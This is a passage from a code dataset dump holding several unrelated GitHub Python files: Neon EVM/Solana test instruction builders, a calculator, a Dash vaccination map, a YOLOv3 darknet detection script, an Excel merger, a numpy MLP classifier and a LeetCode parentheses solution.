is_writable=True),\n AccountMeta(pubkey=SYS_PROGRAM_ID,\n is_signer=False, is_writable=False),\n ]\n\n data = bytes.fromhex('27') + bytes.fromhex(neon_wallet_address[2:])\n return TransactionInstruction(\n program_id=PublicKey(evm_loader_id),\n keys=keys,\n data=data)\n\n @staticmethod\n def compute_budget_utils(operator, units=DEFAULT_UNITS) -> TransactionInstruction:\n return TransactionInstruction(\n program_id=COMPUTE_BUDGET_ID,\n keys=[AccountMeta(PublicKey(operator.public_key),\n is_signer=True, is_writable=False)],\n data=bytes.fromhex(\"02\") + units.to_bytes(4, \"little\")\n )\n\n @staticmethod\n def request_heap_frame(operator, heap_frame=DEFAULT_HEAP_FRAME) -> TransactionInstruction:\n return TransactionInstruction(\n program_id=COMPUTE_BUDGET_ID,\n keys=[AccountMeta(PublicKey(operator.public_key),\n is_signer=True, is_writable=False)],\n data=bytes.fromhex(\"01\") + heap_frame.to_bytes(4, \"little\")\n )\n\n @staticmethod\n def associated_token_account(\n payer: PublicKey,\n associated_token: PublicKey,\n owner: PublicKey,\n mint: PublicKey,\n instruction_data: bytes,\n programId=TOKEN_PROGRAM_ID,\n associatedTokenProgramId=ASSOCIATED_TOKEN_PROGRAM_ID) -> TransactionInstruction:\n keys = [\n AccountMeta(pubkey=payer, is_signer=True, is_writable=True),\n AccountMeta(pubkey=associated_token,\n is_signer=False, is_writable=True),\n AccountMeta(pubkey=owner, is_signer=False, is_writable=False),\n AccountMeta(pubkey=mint, is_signer=False, is_writable=False),\n AccountMeta(pubkey=SYS_PROGRAM_ID,\n is_signer=False, is_writable=False),\n AccountMeta(pubkey=programId, is_signer=False, is_writable=False),\n ]\n\n return TransactionInstruction(\n keys=keys,\n program_id=associatedTokenProgramId,\n data=instruction_data\n )\n\n @staticmethod\n def claim(_from, to, amount, web3_client, ata_address,\n emulate_signer, contract, gas_price=None):\n emulated_tx = None\n result = dict()\n\n claim_to = contract.contract.functions.claimTo(\n bytes(ata_address), _from.address, amount)\n data = claim_to.abi\n\n tx = {\n \"from\": _from.address,\n \"to\": to,\n \"nonce\": web3_client.eth.get_transaction_count(emulate_signer.address),\n \"gasPrice\": gas_price if gas_price is not None else web3_client.gas_price(),\n \"chainId\": web3_client._chain_id,\n \"data\": json.dumps(data).encode('utf-8'),\n \"gas\": 100000000\n }\n\n signed_tx = web3_client._web3.eth.account.sign_transaction(\n tx, _from.key)\n\n if signed_tx.rawTransaction is not None:\n emulated_tx = web3_client.get_neon_emulate(\n str(signed_tx.rawTransaction.hex())[2:])\n\n if emulated_tx is not None:\n for account in emulated_tx['result']['accounts']:\n key = account['account']\n result[key] = AccountMeta(pubkey=PublicKey(\n key), is_signer=False, is_writable=True)\n if 'contract' in account:\n key = account['contract']\n result[key] = AccountMeta(pubkey=PublicKey(\n key), is_signer=False, is_writable=True)\n\n for account in emulated_tx['result']['solana_accounts']:\n key = account['pubkey']\n result[key] = AccountMeta(pubkey=PublicKey(\n key), is_signer=False, is_writable=True)\n\n return signed_tx, result\n\n @staticmethod\n def buld_tx_instruction(solana_wallet, neon_wallet, neon_raw_transaction,\n neon_keys, evm_loader_id, neon_pool_count):\n program_id = PublicKey(evm_loader_id)\n treasure_pool_index = math.floor(random.randint(\n 0, 1) * int(neon_pool_count)) % int(neon_pool_count)\n treasure_pool_address = get_collateral_pool_address(\n treasure_pool_index, evm_loader_id)\n\n data = bytes.fromhex('1f') + treasure_pool_index.to_bytes(4, 'little') + \\\n bytes.fromhex(str(neon_raw_transaction.hex())[2:])\n keys = [AccountMeta(pubkey=solana_wallet, is_signer=True, is_writable=True),\n AccountMeta(pubkey=treasure_pool_address,\n is_signer=False, is_writable=True),\n AccountMeta(pubkey=neon_wallet,\n is_signer=False, is_writable=True),\n AccountMeta(pubkey=SYS_PROGRAM_ID,\n is_signer=False, is_writable=False),\n AccountMeta(pubkey=program_id, is_signer=False,\n is_writable=False),\n ]\n\n for k in neon_keys:\n keys.append(neon_keys[k])\n\n return TransactionInstruction(\n keys=keys,\n program_id=program_id,\n data=data\n )\n\n\ndef get_collateral_pool_address(index: int, evm_loader_id):\n return PublicKey.find_program_address(\n [bytes('treasury_pool', 'utf8'), index.to_bytes(4, 'little')],\n PublicKey(evm_loader_id)\n )[0]\n\n\ndef get_solana_wallet_signer(solana_account, neon_account, web3_client):\n solana_wallet = base58.b58encode(str(solana_account.public_key))\n neon_wallet = bytes(neon_account.address, 'utf-8')\n new_wallet = hashlib.sha256(solana_wallet + neon_wallet).hexdigest()\n emulate_signer_private_key = f'0x{new_wallet}'\n return web3_client._web3.eth.account.from_key(emulate_signer_private_key)\n","repo_name":"neonevm/neon-tests","sub_path":"utils/instructions.py","file_name":"instructions.py","file_ext":"py","file_size_in_byte":8225,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"}
+{"seq_id":"27085334249","text":"\n\nwhile True:\n n1=input('Digite um numero:')\n operador=input ('Digite um operador[/*+-]:')\n n2=input('Digite um outro numero :')\n\n numeros_validos=None\n n1_float=0\n n2_float=0\n try:\n n1_float=float(n1)\n n2_float=float(n2)\n numeros_validos=True\n\n except Exception as error:\n \n print(error)\n\n\n if numeros_validos is None:\n print('Um ou ambos os numeros digitados são invalidos')\n continue\n operadores_permitidos='/*+-'\n if operador not in operadores_permitidos:\n print('Operador invalido')\n\n if len(operador)>1:\n print('Digite um unico operador')\n continue\n print('Realizando calculo')\n if operador =='+': \n print(n1_float+n2_float)\n elif operador =='-':\n \n print(n1_float-n2_float)\n elif operador =='*':\n \n print(n1_float*n2_float)\n elif operador =='/':\n \n print(n1_float/n2_float)\n\n ######\n sair= input('Sair?[s]').lower().startswith('s')\n \n if sair is True:\n break","repo_name":"Alesfjr/curso_python","sub_path":"calculadora/caculatorWHILE.PY","file_name":"caculatorWHILE.PY","file_ext":"py","file_size_in_byte":1063,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"4685943665","text":"import dash_core_components as dcc\nimport dash_html_components as html\nfrom dash.dependencies import Input, Output\nimport claudio_funcoes_usage as cv # function usage geral\nimport pandas as pd\n#from .barras_fx_etaria import barras_fx_etaria, barras_sub_plot_vacina\n#maps\nimport plotly.express as px # plot dynamic\nimport datetime # time\nimport statistics # function statistics\nimport json\nfrom urllib.request import urlopen\nimport pandas as pd\nimport numpy\n\ndef read_data():\n \"\"\"Read data\"\"\"\n #filtered.csv': paciente_datanascimento;paciente_enumsexobiologico;paciente_racacor_codigo;paciente_endereco_uf;vacina_grupoatendimento_codigo;vacina_dataaplicacao;vacina_descricao_dose;vacina_codigo\n dados = cv.arquivo_para_corpus_delimiter(f'dataset/vacinaOpenDataSUS/filtered.csv', ';', 1000) # arquivo com os dados \n grupo_categoria = cv.arquivo_para_corpus_delimiter(f'dataset/vacinaOpenDataSUS/grupo-categoria.csv', ';') # 4 vacina_grupoatendimento_codigo[ vacina_grupoatendimento_codigo;vacina_grupoatendimento_nome;vacina_categoria_nome ]\n #grupo = cv.arquivo_para_corpus_delimiter(f'dataset/vacinaOpenDataSUS/grupo.csv', ';')\n raca = cv.arquivo_para_corpus_delimiter(f'dataset/vacinaOpenDataSUS/raca.csv', ';') # paciente_racacor_codigo, 2\n tipos_vacina = cv.arquivo_para_corpus_delimiter(f'dataset/vacinaOpenDataSUS/vacina.csv', ';') # vacina_codigo 7\n \n vacinas_estado = dict()\n for index in range(1,len(dados)): \n age = int( ( datetime.datetime.today() - datetime.datetime.strptime(dados[index][0], '%Y-%m-%d')).days / 365.25 )\n if vacinas_estado.get( dados[index][3] ) == None: \n vacinas_estado[ dados[index][3] ] = {'qtd' : 0, 'age' : [] }\n vacinas_estado[ dados[index][3] ] ['qtd'] +=1 # estado \n vacinas_estado[ dados[index][3] ] ['age'].append(age) # idade \n \n vacinas_estado = cv.remove_key_dict(vacinas_estado, 'XX'); vacinas_estado = cv.remove_key_dict(vacinas_estado, 'paciente_endereco_uf') \n for k in vacinas_estado: \n vacinas_estado[k]['age_media'] = statistics.mean( vacinas_estado[k]['age'] ) \n vacinas_estado[k]['age_median'] = statistics.median( vacinas_estado[k]['age'] ) \n vacinas_estado[k]['age_histogram'] = numpy.histogram(vacinas_estado[k]['age'], bins=10) \n \n dados = {'sigla': list(vacinas_estado.keys()), 'média idade' : [vacinas_estado[k]['age_media'] for k in vacinas_estado],\n 'mediana idade' : [vacinas_estado[k]['age_median'] for k in vacinas_estado],\n 'age_histogram' : [vacinas_estado[k]['age_histogram'] for k in vacinas_estado]}\n dados = pd.DataFrame(dados ) \n brasil = json.load(open( 'dataset/mapa_brasil'))\n \n nomes = []\n sigla_nome = {}\n for feature in brasil['features']: \n feature['id'] = feature['properties']['sigla'] \n #nomes.append( feature['properties']['name'] )\n sigla_nome [ feature['properties']['sigla'] ] = feature['properties']['name'] \n \n nomes_ordem = [] \n for d in dados['sigla']:\n #print(d)\n nomes_ordem.append(sigla_nome[d])\n dados['Nome'] = nomes_ordem\n \n #nomes_estados = ['Acre','Alagoas','Amazonas','Amapá','Bahia','Ceará','Espírito Santo','Goiás','Maranhão','Minas Gerais','Mato Grosso do Sul','Mato Grosso','Pará','Paraíba','Pernambuco','Piauí' ,'Paraná','Rio de Janeiro','Rio Grande do Norte','Rondônia','Roraima','Rio Grande do Sul','Santa Catarina', 'Sergipe', 'São Paulo', 'Tocantins', 'Distrito Federal']\n \n #dados['nomes'] = nomes\n #print(dados)\n \n #print(dados['nomes'])\n #print(dados['sigla'])\n \n fig = px.choropleth(\n dados,\n locations='sigla',\n geojson = brasil,\n color='média idade',\n hover_data=['Nome', 'mediana idade'],\n scope='south america'\n ) \n return fig\n #fig.show()\n \n #fig = px.bar(x=list(vacinas_estado.keys()), y=[vacinas_estado[k]['qtd'] for k in vacinas_estado]) \n #fig.update_layout(xaxis_title='Estados', yaxis_title='Quantidade de vacinas')\n #fig.show() \n #fig.write_html(\"html/mapa.html\")\n\n\n\ndef graficos_valiense(app):\n \n return read_data() \n\n components_html = []\n\n #components_html.append(grafico_total_vacinas_idade(app))\n \n #components_html.append(grafico_sub_plot_vacinas_idade(app))\n components_html.append( read_data() )\n\n return components_html","repo_name":"claudiovaliense/visualizacao_covid","sub_path":"valiense/graficos_valiense.py","file_name":"graficos_valiense.py","file_ext":"py","file_size_in_byte":4439,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"}
+{"seq_id":"6409265323","text":"# -*- coding: utf-8 -*-\n# @Time : 2019-10-15 16:40\n# @Author : Yan An\n# @Contact: an.yan@intellicold.ai\n\nfrom __future__ import print_function\n\nimport os\nimport cv2\nimport time\nimport pynvml\nimport random\nimport argparse\nimport numpy as np\n\nfrom utils import *\nfrom ctypes import *\nfrom tqdm import tqdm\n\ndef sample(probs):\n s = sum(probs)\n probs = [a/s for a in probs]\n r = random.uniform(0, 1)\n for i in range(len(probs)):\n r = r - probs[i]\n if r <= 0:\n return i\n return len(probs)-1\n\n\ndef c_array(ctype, values):\n arr = (ctype*len(values))()\n arr[:] = values\n return arr\n\n\nclass BOX(Structure):\n _fields_ = [(\"x\", c_float),\n (\"y\", c_float),\n (\"w\", c_float),\n (\"h\", c_float)]\n\n\nclass DETECTION(Structure):\n _fields_ = [(\"bbox\", BOX),\n (\"classes\", c_int),\n (\"prob\", POINTER(c_float)),\n (\"mask\", POINTER(c_float)),\n (\"objectness\", c_float),\n (\"sort_class\", c_int)]\n\n\nclass IMAGE(Structure):\n _fields_ = [(\"w\", c_int),\n (\"h\", c_int),\n (\"c\", c_int),\n (\"data\", POINTER(c_float))]\n\n\nclass METADATA(Structure):\n _fields_ = [(\"classes\", c_int),\n (\"names\", POINTER(c_char_p))]\n\n\nlib = CDLL(\"./darknet/libdarknet.so\", RTLD_GLOBAL)\nlib.network_width.argtypes = [c_void_p]\nlib.network_width.restype = c_int\nlib.network_height.argtypes = [c_void_p]\nlib.network_height.restype = c_int\n\npredict = lib.network_predict\npredict.argtypes = [c_void_p, POINTER(c_float)]\npredict.restype = POINTER(c_float)\n\nset_gpu = lib.cuda_set_device\nset_gpu.argtypes = [c_int]\n\nmake_image = lib.make_image\nmake_image.argtypes = [c_int, c_int, c_int]\nmake_image.restype = IMAGE\n\nget_network_boxes = lib.get_network_boxes\nget_network_boxes.argtypes = [c_void_p, c_int, c_int, c_float, c_float, POINTER(c_int), c_int, POINTER(c_int)]\nget_network_boxes.restype = POINTER(DETECTION)\n\nmake_network_boxes = lib.make_network_boxes\nmake_network_boxes.argtypes = [c_void_p]\nmake_network_boxes.restype = POINTER(DETECTION)\n\nfree_detections = lib.free_detections\nfree_detections.argtypes = [POINTER(DETECTION), c_int]\n\nfree_ptrs = lib.free_ptrs\nfree_ptrs.argtypes = [POINTER(c_void_p), c_int]\n\nnetwork_predict = lib.network_predict\nnetwork_predict.argtypes = [c_void_p, POINTER(c_float)]\n\nreset_rnn = lib.reset_rnn\nreset_rnn.argtypes = [c_void_p]\n\nload_net = lib.load_network\nload_net.argtypes = [c_char_p, c_char_p, c_int]\nload_net.restype = c_void_p\n\ndo_nms_obj = lib.do_nms_obj\ndo_nms_obj.argtypes = [POINTER(DETECTION), c_int, c_int, c_float]\n\ndo_nms_sort = lib.do_nms_sort\ndo_nms_sort.argtypes = [POINTER(DETECTION), c_int, c_int, c_float]\n\nfree_image = lib.free_image\nfree_image.argtypes = [IMAGE]\n\nletterbox_image = lib.letterbox_image\nletterbox_image.argtypes = [IMAGE, c_int, c_int]\nletterbox_image.restype = IMAGE\n\nload_meta = lib.get_metadata\nlib.get_metadata.argtypes = [c_char_p]\nlib.get_metadata.restype = METADATA\n\nload_image = lib.load_image_color\nload_image.argtypes = [c_char_p, c_int, c_int]\nload_image.restype = IMAGE\n\nrgbgr_image = lib.rgbgr_image\nrgbgr_image.argtypes = [IMAGE]\n\npredict_image = lib.network_predict_image\npredict_image.argtypes = [c_void_p, IMAGE]\npredict_image.restype = POINTER(c_float)\n\nndarray_image = lib.ndarray_to_image\nndarray_image.argtypes = [POINTER(c_ubyte), POINTER(c_long), POINTER(c_long)]\nndarray_image.restype = IMAGE\n\n\ndef nparray_to_image(img):\n data = img.ctypes.data_as(POINTER(c_ubyte))\n image = ndarray_image(data, img.ctypes.shape, img.ctypes.strides)\n return image\n\n\ndef yolo_detect(net, meta, image, thresh=.5, hier_thresh=.1, nms=.45):\n im = nparray_to_image(image)\n num = c_int(0)\n pnum = pointer(num)\n predict_image(net, im)\n dets = get_network_boxes(net, im.w, im.h, thresh, hier_thresh, None, 0, pnum)\n num = pnum[0]\n if (nms): do_nms_obj(dets, num, meta.classes, nms);\n\n res = []\n for j in range(num):\n for i in range(meta.classes):\n if dets[j].prob[i] > 0:\n b = dets[j].bbox\n res.append((meta.names[i], dets[j].prob[i], (b.x, b.y, b.w, b.h)))\n res = sorted(res, key=lambda x: -x[1])\n\n free_image(im)\n free_detections(dets, num)\n return res\n\ndef main(args):\n gpu_id = c_int(args.gpu_id)\n set_gpu(gpu_id)\n\n info = load_dict()\n\n input_size = info['input_size']\n yolo_net = load_net(('./darknet/cfg/yolov3-' + str(input_size) + '_test.cfg').encode(),\n ('./darknet/backup/yolov3-' + str(input_size) + '.backup').encode(), 0)\n meta = load_meta(b'./darknet/cfg/voc.data')\n print('Finished loading model!')\n\n labels = [x for x in info['classes'].keys()]\n\n f = open('./darknet/dataset/valid.txt')\n test_picures_path = f.readlines()\n\n resumes = []\n for picture in tqdm(test_picures_path):\n picture = picture.replace('\\n', '')\n\n txt_name = picture.split('/')[-1].replace('jpg','txt')\n f2 = open('results_txt/' + txt_name, 'w', encoding = 'utf-8')\n image = cv2.imread(picture)\n begin = time.time()\n yolo_dets = yolo_detect(yolo_net, meta, image)\n resume = time.time() - begin\n resumes.append(resume)\n FPS = 1/(sum(resumes)/len(resumes))\n print('FPS: ',FPS)\n\n # visulization\n person_boxes = []\n\n for i, det in enumerate(yolo_dets):\n flag = True\n box = det[2]\n cx, cy, w, h = np.array(box)\n x1 = cx - w / 2\n y1 = cy - h / 2\n x2 = cx + w / 2\n y2 = cy + h / 2\n label = det[0].decode()\n index = labels.index(label)\n f2.write(str(index) + ' ' + str(int(x1 + 0.5)) + ' ' + str(int(y1 + 0.5)) + ' ' + str(int(x2 + 0.5)) + ' ' + str(int(y2 + 0.5)) + '\\n')\n if args.save_pic:\n cv2.rectangle(image,(int(x1),int(y1)),(int(x2),int(y2)),(0,255,0),2)\n cv2.putText(image,label,(int(x1), int(y1) - 10),cv2.FONT_HERSHEY_SIMPLEX,2,(0, 0, 255), 2)\n if args.save_pic:\n cv2.imwrite('results/'+picture.split('/')[-1],image)\n f.close()\n write_dict('FPS', int(FPS))\n\n GPU_type, GPU_used = get_gpu_info(args.gpu_id)\n write_dict('GPU_type: ',GPU_type)\n write_dict('GPU_used: ',str(int(GPU_used)) + 'M')\n \n\nif __name__ == '__main__':\n print('detecting...')\n parser = argparse.ArgumentParser('detect images')\n parser.add_argument(\"--gpu_id\", type=int, default=0, help=\"which gpu to use\")\n parser.add_argument(\"--save_pic\", type=bool, default=False, help=\"whether pic to save\")\n arguments = parser.parse_args()\n main(args=arguments)\n\n\n\n\n","repo_name":"isyanan1024/YOLOV3","sub_path":"detection.py","file_name":"detection.py","file_ext":"py","file_size_in_byte":6710,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"}
+{"seq_id":"22207102638","text":"import pandas as pd\nimport streamlit as st\n\ndata_df = pd.DataFrame(\n {\n \"widgets\": [\"st.selectbox\", \"st.number_input\", \"st.text_area\", \"st.button\"],\n }\n)\n\nst.dataframe(\n data_df,\n column_config={\n \"widgets\": st.column_config.Column(\n width=\"medium\"\n )\n }\n)\n","repo_name":"streamlit/st-issues","sub_path":"issues/gh-6879/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":304,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"}
+{"seq_id":"23356407829","text":"import os\nfrom openpyxl import load_workbook, Workbook\nfrom openpyxl.utils import get_column_letter\n\n\ntweets = load_workbook(\"/Users/USER/FILE/EXCEL_FILE.xlsx\",data_only=True)\ntweetsWS = tweets[\"Sheet1\"]\n\ncheckingSamples = load_workbook(\"/Users/USER/FILE/EXCEL_FILE#2w.xlsx\",data_only=True)\ncheckingSamplesWS = checkingSamples[\"BR\"]\n\nWB = Workbook()\nWS = WB.active\n\n# create 2D lists to hold cell data\nrowtweets = []\nrowSamples = []\n\n# append cell data to lists\nfor row in range(1,58649):\n columnData = []\n for col in range(1,8):\n char = get_column_letter(col)\n columnData.append(tweetsWS[char+str(row)].value)\n rowtweets.append(columnData)\n\nfor row in range(1,148):\n CheckingData = []\n for col in range(1,4):\n char = get_column_letter(col)\n CheckingData.append(checkingSamplesWS[char+str(row)].value)\n rowSamples.append(CheckingData)\n\n# merge data between two files\nfor i in rowtweets:\n for k in rowSamples:\n if str(i[0]) == str(k[2]):\n i[5] = k[0]\n\n\n# print the new cell data into excel file\nfor b in range(0,len(rowtweets),1):\n WS.append(rowtweets[b])\nWB.save(\"Vinies Tweets.xlsx\")\n","repo_name":"xanderrp2/RandomPractice","sub_path":"Lab_merger_crude.py","file_name":"Lab_merger_crude.py","file_ext":"py","file_size_in_byte":1171,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"73830166247","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# ## Modelo para o Sensor CEI\n# \n# Este dataset **\"DataCEI.csv\"** possui informações dispostas em colunas sobre as características dos objetos que passam pelo sensor:\n# \n# * **Tamanho**: Segue a classificação do CEI2020 (Tamanho='0' - Grande 100%).\n# * **Referencia**: Referência dinâmica do *Threshold.\n# * **NumAmostra**: Número de amostras adquiridas.\n# * **Area**: Somatório das Amplitudes das amostras.\n# * **Delta**: Máxima Amplitude da amostra.\n# * **Output1**: Peça tipo 1.\n# * **Output2**: Peça tipo 2.\n\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport seaborn as sns\n#get_ipython().run_line_magic('matplotlib', 'inline')\n\n#Função do cáculo da sigmóide\ndef sigmoid(x):\n return 1/(1+np.exp(-x))\n\n\n# Carregando os dados\n# Vamos começar lendo o arquivo DataCEI.csv em um dataframe do pandas.\nDataSet=pd.read_csv('arruela_.csv')\nDataSet.head()\nDataSet.drop(['Hora','Tamanho','Referencia'],axis=1,inplace=True)\nDataSet.head()\nDataSet.describe()\n\n# ### Váriaveis do *Dataset*\n\nDataSet.columns\n# ### Número de Peças\n# \n# #### Vamos classificar os grupos pelo número de peças: \n# 1. Grupo com uma peça\n# 2. Grupo com duas peças\nsns.set_style('whitegrid')\nsns.countplot(x='Output2',data=DataSet,palette='RdBu_r')\nplt.show()\n\n# #### Gráfico da distribuição das áreas das peças\n\nsns.distplot(DataSet['Area'].dropna(),kde=False,color='darkred',bins=30)\nplt.show()\n\nsns.set_style('whitegrid')\nsns.countplot(x='Area',hue='Output2',data=DataSet,palette='rainbow')\nplt.show()\n\nsns.set_style('whitegrid')\nsns.countplot(x='NumAmostra',hue='Output2',data=DataSet,palette='rainbow')\nplt.show()\n\n\nsns.set_style('whitegrid')\nsns.countplot(x='Delta',hue='Output1',data=DataSet,palette='rainbow')\nplt.show()\n\n# ## As variáveis preditoras e a variável de resposta\n# \n# Para treinar o modelo de regressão, primeiro precisaremos dividir nossos dados em uma matriz **X** que contenha os dados das variáveis preditoras e uma matriz **y** com os dados da variável de destino.\n# \n# ### Matrizes X e y\n\n#X = DataSet[[ 'NumAmostra', 'Area', 'Delta']]\n#y = DataSet[['Output1','Output2']]\n\n# ### Relação entre as variáveis preditoras\n# \n# #### Algumas questões importantes\n# 1. Pelo menos um dos preditores ***x1, x2, ... ,x5*** é útil na previsão da resposta?\n# 2. Todos os preditores ajudam a explicar **y**, ou apenas um subconjunto dos preditores?\n# 3. Quão bem o modelo se ajusta aos dados?\n# 4. Dado um conjunto de valores de previsão, quais valores de resposta devemos prever e quais as métricas indicam um bom modelo de previsão?\n# \n# **Gráficos simples de dispersão**\n# \n# Pelos gráficos abaixo percebemos ... nossa variável de resposta\nsns.pairplot(DataSet)\nplt.show()\n\n\n# **Mapa de Calor**\n# \n# O gráfico abaixo mostra através de uma escala de cores a correlação entre as variáveis do *Dataset*. Se observarmos as cores deste gráfico, a variável preditora **'Area'** possui maior correlação com a variável de resposta **'Output'** e a variável **'NumAmostra'** a menor.\n\nsns.heatmap(DataSet.corr())\nplt.show()\n\n\n# ## Normalização dos Dados\n\nfrom sklearn.preprocessing import StandardScaler\nscaler=StandardScaler()\nDataScaled=scaler.fit_transform(DataSet)\nDataSetScaled=pd.DataFrame(np.array(DataScaled),columns = ['NumAmostra', 'Area', 'Delta', 'Output1','Output2'])\n\nDataSetScaled.head()\n\nX = DataSetScaled.drop(['Output1', 'Output2'],axis=1)\ny = DataSet[['Output1','Output2']]\n\n\n# ## Separando os dados de treinamento e de validação\n# \n# Agora vamos dividir os dados em um conjunto de treinamento e um conjunto de testes. Vamos treinar o modelo no conjunto de treinamento, em seguida, usar o conjunto de teste para validar o modelo.\n# \n# Em nosso exemplo iremos separar de forma randômica 33% dos dados para validação. Estes dados não serão utilizados para determinação dos coeficientes preditores do modelo. \n# \n\nfrom sklearn.model_selection import train_test_split\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.29, random_state=3)\n\nprint(y_test)\nprint(X_test)\n# ## Criando o Modelo de MPL\n\n\n#Tamanho do DataSet de Treinamento\nn_records, n_features = X_train.shape\n\n#Arquitetura da MPL\nN_input = 3\nN_hidden = 8\nN_output = 2\nlearnrate = 0.1\n# ## Inicialização dos pesos da MPL (Aleatório)\n\n#Pesos da Camada Oculta (Inicialização Aleatória)\nweights_input_hidden = np.random.normal(0, scale=0.1, size=(N_input, N_hidden))\nprint('Pesos da Camada Oculta:')\nprint(weights_input_hidden)\n\n#Pesos da Camada de Saída (Inicialização Aleatória)\nweights_hidden_output = np.random.normal(0, scale=0.1, size=(N_hidden, N_output))\nprint('Pesos da Camada de Saída:')\nprint(weights_hidden_output)\n\n\n# ## Algoritmo Backpropagation\n\nepochs = 50000\nlast_loss=None\nEvolucaoError=[]\nIndiceError=[]\n\nfor e in range(epochs):\n delta_w_i_h = np.zeros(weights_input_hidden.shape)\n delta_w_h_o = np.zeros(weights_hidden_output.shape)\n for xi, yi in zip(X_train.values, y_train.values):\n \n# Forward Pass\n #Camada oculta\n #Calcule a combinação linear de entradas e pesos sinápticos\n hidden_layer_input = np.dot(xi, weights_input_hidden)\n #Aplicado a função de ativação\n hidden_layer_output = sigmoid(hidden_layer_input)\n \n #Camada de Saída\n #Calcule a combinação linear de entradas e pesos sinápticos\n output_layer_in = np.dot(hidden_layer_output, weights_hidden_output)\n\n #Aplicado a função de ativação \n output = sigmoid(output_layer_in)\n #print('As saídas da rede são',output)\n#------------------------------------------- \n \n# Backward Pass\n ## TODO: Cálculo do Erro\n error = yi - output\n \n # TODO: Calcule o termo de erro de saída (Gradiente da Camada de Saída)\n output_error_term = error * output * (1 - output)\n\n # TODO: Calcule a contribuição da camada oculta para o erro\n hidden_error = np.dot(weights_hidden_output,output_error_term)\n \n # TODO: Calcule o termo de erro da camada oculta (Gradiente da Camada Oculta)\n hidden_error_term = hidden_error * hidden_layer_output * (1 - hidden_layer_output)\n \n # TODO: Calcule a variação do peso da camada de saída\n delta_w_h_o += output_error_term*hidden_layer_output[:, None]\n\n # TODO: Calcule a variação do peso da camada oculta\n delta_w_i_h += hidden_error_term * xi[:, None]\n \n #Atualização dos pesos na época em questão\n weights_input_hidden += learnrate * delta_w_i_h / n_records\n weights_hidden_output += learnrate * delta_w_h_o / n_records\n \n \n # Imprimir o erro quadrático médio no conjunto de treinamento\n \n if e % (epochs / 20) == 0:\n hidden_output = sigmoid(np.dot(xi, weights_input_hidden))\n out = sigmoid(np.dot(hidden_output,\n weights_hidden_output))\n loss = np.mean((out - yi) ** 2)\n\n if last_loss and last_loss < loss:\n print(\"Erro quadrático no treinamento: \", loss, \" Atenção: O erro está aumentando\")\n else:\n print(\"Erro quadrático no treinamento: \", loss)\n last_loss = loss\n \n EvolucaoError.append(loss)\n IndiceError.append(e)\n\n### Gráfico da Evolução do Erro\n\n\nplt.plot(IndiceError, EvolucaoError, 'r') # 'r' is the color red\nplt.xlabel('')\nplt.ylabel('Erro Quadrático')\nplt.title('Evolução do Erro no treinamento da MPL')\nplt.show()\n\n\n# ## Validação do modelo\n\n# Calcule a precisão dos dados de teste\nn_records, n_features = X_test.shape\npredictions=0\n\nfor xi, yi in zip(X_test.values, y_test.values):\n\n# Forward Pass\n #Camada oculta\n #Calcule a combinação linear de entradas e pesos sinápticos\n hidden_layer_input = np.dot(xi, weights_input_hidden)\n #Aplicado a função de ativação\n hidden_layer_output = sigmoid(hidden_layer_input)\n \n #Camada de Saída\n #Calcule a combinação linear de entradas e pesos sinápticos\n output_layer_in = np.dot(hidden_layer_output, weights_hidden_output)\n\n #Aplicado a função de ativação \n output = sigmoid(output_layer_in)\n\n#------------------------------------------- \n \n#Cálculo do Erro da Predição\n ## TODO: Cálculo do Erro \n if (output[0]>output[1]):\n if (yi[0]>yi[1]):\n predictions+=1\n \n if (output[1]>=output[0]):\n if (yi[1]>yi[0]):\n predictions+=1\n\nprint(\"A Acurácia da Predição é de: {:.3f}\".format(predictions/n_records))\n ","repo_name":"darlanSchmitz25/IA","sub_path":"0.921.py","file_name":"0.921.py","file_ext":"py","file_size_in_byte":8664,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"72070837287","text":"# 给你一个只包含 '(' 和 ')' 的字符串,找出最长有效(格式正确且连续)括号子串的长度。 \n# \n# \n# \n# \n# \n# 示例 1: \n# \n# \n# 输入:s = \"(()\"\n# 输出:2\n# 解释:最长有效括号子串是 \"()\"\n# \n# \n# 示例 2: \n# \n# \n# 输入:s = \")()())\"\n# 输出:4\n# 解释:最长有效括号子串是 \"()()\"\n# \n# \n# 示例 3: \n# \n# \n# 输入:s = \"\"\n# 输出:0\n# \n# \n# \n# \n# 提示: \n# \n# \n# 0 <= s.length <= 3 * 10⁴ \n# s[i] 为 '(' 或 ')' \n# \n# \n# \n# 👍 1785 👎 0\n\n\n# leetcode submit region begin(Prohibit modification and deletion)\nclass Solution:\n def longestValidParentheses(self, s: str) -> int:\n \"\"\"\n 方法1:动态规划\n 思路:最值问题,思考用动态规划去解决。\n 定义dp:dp[i]表示以下标i结尾的最长有效子串长度。\n base case:\n 分析:when s[i] is '(', s[i] not in subs, so dp[i] = 0\n when s[i] is ')', should look s[i-1]:\n if s[i-1] is '(', then dp[i] = dp[i-2] + 2\n if s[i-1] is ')', if s[i-dp[i-1]-1] is '(', then dp[i] = dp[i-1] + 2 + dp[i-dp[i-1]-2]\n \"\"\"\n if not s:\n return 0\n n = len(s)\n dp = [0 for _ in range(n)]\n\n for i in range(1, n):\n if s[i] == ')':\n if s[i-1] == '(':\n dp[i] = dp[i-2] + 2 if i > 1 else 2\n elif s[i-1] == ')':\n if i-dp[i-1] > 0 and s[i-dp[i-1]-1] == '(':\n if i - dp[i-1] >= 2:\n dp[i] = dp[i-1] + 2 + dp[i-dp[i-1]-2]\n else:\n dp[i] = dp[i-1] + 2\n\n return max(dp)\n# leetcode submit region end(Prohibit modification and deletion)\n\n\nif __name__ == '__main__':\n # s = \"(()\"\n s = \")()())\"\n result = Solution().longestValidParentheses(s)\n 